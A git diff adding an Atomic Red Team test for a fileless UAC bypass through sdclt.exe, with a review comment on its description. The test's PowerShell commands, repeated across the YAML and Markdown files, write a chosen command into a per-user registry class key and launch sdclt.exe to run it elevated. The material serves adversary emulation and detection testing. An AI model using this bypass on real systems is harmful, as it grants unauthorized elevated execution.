diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index beaa5dfd..5d84ca45 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -96,6 +96,7 @@ defense-evasion,T1088,Bypass User Account Control,3,Bypass UAC using Fodhelper
defense-evasion,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
defense-evasion,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
defense-evasion,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+defense-evasion,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
defense-evasion,T1191,CMSTP,1,CMSTP Executing Remote Scriptlet
defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
defense-evasion,T1146,Clear Command History,1,Clear Bash history (rm)
@@ -290,6 +291,7 @@ privilege-escalation,T1088,Bypass User Account Control,3,Bypass UAC using Fodhel
privilege-escalation,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
privilege-escalation,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
privilege-escalation,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+privilege-escalation,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
privilege-escalation,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
privilege-escalation,T1519,Emond,1,Persistance with Event Monitor - emond
privilege-escalation,T1044,File System Permissions Weakness,1,File System Permissions Weakness
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 507ed651..d4575135 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -8,6 +8,7 @@ defense-evasion,T1088,Bypass User Account Control,3,Bypass UAC using Fodhelper
defense-evasion,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
defense-evasion,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
defense-evasion,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+defense-evasion,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
defense-evasion,T1191,CMSTP,1,CMSTP Executing Remote Scriptlet
defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
defense-evasion,T1500,Compile After Delivery,1,Compile After Delivery using csc.exe
@@ -140,6 +141,7 @@ privilege-escalation,T1088,Bypass User Account Control,3,Bypass UAC using Fodhel
privilege-escalation,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
privilege-escalation,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
privilege-escalation,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+privilege-escalation,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
privilege-escalation,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
privilege-escalation,T1044,File System Permissions Weakness,1,File System Permissions Weakness
privilege-escalation,T1179,Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d57e593a..31e8214b 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -167,6 +167,7 @@
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+ - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- [T1191 CMSTP](../../T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -437,6 +438,7 @@
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+ - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- [T1038 DLL Search Order Hijacking](../../T1038/T1038.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e4915031..475285dc 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -13,6 +13,7 @@
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+ - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- [T1191 CMSTP](../../T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -209,6 +210,7 @@
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+ - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- [T1038 DLL Search Order Hijacking](../../T1038/T1038.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index f9512a17..79dc6311 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -6074,6 +6074,30 @@ defense-evasion:
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
+ - name: Bypass UAC using sdclt DelegateExecute
+ description: "Bypasses User Account Control using a fileless method, registry
+ only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
+ - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
+ from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ command.to.execute:
+ description: Command to execute
+ type: string
+ default: cmd.exe /c notepad.exe
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+ New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ Start-Sleep -s 3
+ cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
+ -Force -ErrorAction Ignore
+
+'
T1191:
technique:
x_mitre_data_sources:
@@ -14605,6 +14629,30 @@ privilege-escalation:
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
+ - name: Bypass UAC using sdclt DelegateExecute
+ description: "Bypasses User Account Control using a fileless method, registry
+ only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
+ - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
+ from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ command.to.execute:
+ description: Command to execute
+ type: string
+ default: cmd.exe /c notepad.exe
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+ New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ Start-Sleep -s 3
+ cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
+ -Force -ErrorAction Ignore
+
+'
T1038:
technique:
x_mitre_permissions_required:
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md
index f3be20d9..040bee66 100644
--- a/atomics/T1088/T1088.md
+++ b/atomics/T1088/T1088.md
@@ -24,6 +24,8 @@ Another bypass is possible through some Lateral Movement techniques if credentia
- [Atomic Test #6 - Bypass UAC by Mocking Trusted Directories](#atomic-test-6---bypass-uac-by-mocking-trusted-directories)
+- [Atomic Test #7 - Bypass UAC using sdclt DelegateExecute](#atomic-test-7---bypass-uac-using-sdclt-delegateexecute)
+
@@ -242,4 +244,43 @@ del "c:\testbypass.exe" >nul 2>nul
+
+
+
+## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute
+Bypasses User Account Control using a fileless method, registry only.
+Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
+[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
+Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command.to.execute | Command to execute | string | cmd.exe /c notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+Start-Process -FilePath $env:windir\system32\sdclt.exe
+Start-Sleep -s 3
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
+```
+
+
+
+
+
diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml
index 95121f78..f7d44c03 100644
--- a/atomics/T1088/T1088.yaml
+++ b/atomics/T1088/T1088.yaml
@@ -136,3 +136,29 @@ atomic_tests:
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
+
+- name: Bypass UAC using sdclt DelegateExecute
+ description: |
+ Bypasses User Account Control using a fileless method, registry only.
+ Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
+ [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
+ Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ command.to.execute:
+ description: Command to execute
+ type: string
+ default: cmd.exe /c notepad.exe
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+ New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ Start-Sleep -s 3
+ cleanup_command: |
+ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
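Review bot: The description of the new `Bypass UAC using sdclt DelegateExecute` entry says `sdclt.exe will spawn cmd.exe to spawn notepad.exe`, but that is only true for the default `command.to.execute`; since the value is user-supplied, the line should read `Upon successful execution, sdclt.exe will launch the command.to.execute value (default: cmd.exe /c notepad.exe)`, and the same wording is carried into the generated index.yaml and T1088.md copies in this commit. The `cleanup_command` removes the whole `HKCU:\Software\Classes\Folder` key recursively rather than just the `shell\open\command` subkey the test created, and it does not stop the notepad.exe the default command leaves running; presumably no such key exists on a default profile, but the description should at least state that the entire key is deleted and that the spawned process is left for the operator to close. Because the bypass is tied to how sdclt.exe resolves that class key, a note on which Windows builds the test was validated against would help, e.g. `Validated on: <WINDOWS_BUILD_PLACEHOLDER>` (I cannot confirm from the page whether newer builds still expose this path). For people using the test to check coverage, one more sentence naming the expected telemetry — the write of `DelegateExecute` under `HKCU\Software\Classes\Folder\shell\open\command` and sdclt.exe starting the configured child process — would make the description self-contained.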